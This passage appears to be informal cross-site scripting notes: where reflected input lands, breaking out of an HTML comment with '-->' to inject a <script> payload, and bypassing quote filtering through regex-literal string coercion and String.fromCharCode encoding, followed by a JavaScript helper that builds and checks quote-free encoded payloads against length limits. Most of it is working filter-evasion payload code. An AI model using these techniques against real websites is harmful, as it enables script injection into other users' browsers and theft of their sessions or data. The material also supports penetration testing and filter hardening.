- the URL (query-string parameters that get reflected into the page)
- an injectable
<input .../>
- or a form input; the search ("find") functions on many websites echo the query back into the page unescaped and are frequently exploitable
First break out of the surrounding markup, e.g. with '-->' to terminate an HTML comment that your input landed in,
then inject your payload, e.g. <script>...</script>
Getting by without double and single quotes (when the target escapes or strips them):
a. build the string from a regex literal: String.prototype.replace coerces a non-function replacement to a string, and a RegExp's string form is its literal text, slashes included
(new String(1)).replace((new Number(1)).toString(10), /look no single or double quotes/); // -> "/look no single or double quotes/"
b. build the string from decimal character codes
String.fromCharCode(n1, n2, ..., nX)
c. replace (for compression of the payload)
Use this Python snippet to turn the payload into the decimal character codes that go into String.fromCharCode (the string literal is a placeholder for your own payload):
[ ord(c) for c in "http://payload_in_decimal" ]  # one decimal code per character
The drawback of this technique is that the decimal form is several times longer than the original (up to three digits plus a comma per character), so it may exceed the maximum length the injection point accepts: the browser's URL length limit, an input tag's maxlength, a form field's server-side limit, etc.
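The encoding step and its size drawback, as an added example that is not part of the original notes: a small Node/browser script that turns a payload into the quote-free String.fromCharCode(...) expression (the JavaScript counterpart of the Python one-liner above), checks that it rebuilds the original string, reproduces the regex-literal trick from (a), and measures how much longer the encoded form is against a length cap. SAMPLE_PAYLOAD and the maxlength values are constructed for illustration, and the Function constructor is used only to verify the round trip locally, not as part of any injection.

```javascript
// Constructed sample payload (not from the notes): it contains both quote
// characters, so a filter that escapes or strips quotes would mangle it.
const SAMPLE_PAYLOAD = 'alert("xss" + \'probe\')';

// UTF-16 code units of the payload in decimal: the same list the Python
// one-liner [ord(c) for c in payload] produces for ASCII input.
function toCharCodes(payload) {
  const codes = [];
  for (let i = 0; i < payload.length; i++) codes.push(payload.charCodeAt(i));
  return codes;
}

// Wrap the codes in a String.fromCharCode(...) call: an expression that
// rebuilds the original string without a single quote character in it.
function toFromCharCode(payload) {
  return 'String.fromCharCode(' + toCharCodes(payload).join(',') + ')';
}

// Local check only: evaluate the generated expression the way a browser
// would and return the rebuilt string. Not part of the injection itself.
function decodeExpression(expr) {
  return Function('return (' + expr + ');')();
}

// The quote-free string trick from note (a): String.prototype.replace coerces
// a non-function replacement value to a string, and the string form of a
// RegExp is its literal text, slashes included. No quote is typed anywhere.
function noQuoteString() {
  return (new String(1)).replace((new Number(1)).toString(10), /look no single or double quotes/);
}

// How many times longer the decimal form is than the original payload.
function expansionRatio(payload) {
  return toFromCharCode(payload).length / payload.length;
}

// Does the encoded payload fit in an injection point that caps its length at
// maxLength (an <input maxlength=...>, a URL length limit, a form field cap)?
function fitsIn(payload, maxLength) {
  return toFromCharCode(payload).length <= maxLength;
}

// Stand-alone run: print the encoded payload, confirm it round-trips and
// contains no quotes, and show the size blow-up against a hypothetical cap.
const encoded = toFromCharCode(SAMPLE_PAYLOAD);
console.log(encoded);
console.log('round-trips:', decodeExpression(encoded) === SAMPLE_PAYLOAD);
console.log('no quotes in encoded form:', !/['"]/.test(encoded));
console.log('expansion ratio:', expansionRatio(SAMPLE_PAYLOAD).toFixed(1) + 'x');
console.log('fits in maxlength=64?', fitsIn(SAMPLE_PAYLOAD, 64));
console.log('no-quote string trick ->', noQuoteString());
```

Run it with node to see that a 22-character payload becomes an expression more than four times as long, which is exactly why the decimal form tends to trip length limits on URLs and input fields.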